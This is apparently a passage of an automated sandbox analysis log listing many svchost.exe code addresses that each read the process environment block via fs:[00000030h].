Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]	2_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]	2_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]	2_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]	2_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]	2_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]	2_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]	2_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]	2_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]	2_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]	2_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]	2_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]	2_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]	2_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]	2_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]	2_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]	2_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]	2_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]	2_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]	2_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]	2_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]	2_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]	2_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]	2_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]	2_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]	2_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]	2_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]	2_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]	2_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]	2_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]	2_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]	2_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]	2_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]	2_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]	2_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]	2_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]	2_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]	2_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]	2_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]	2_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]	2_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]	2_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]	2_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]	2_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]	2_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]	2_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]	2_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]	2_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]	2_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]	2_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]	2_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]	2_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]	2_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]	2_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]	2_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]	2_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
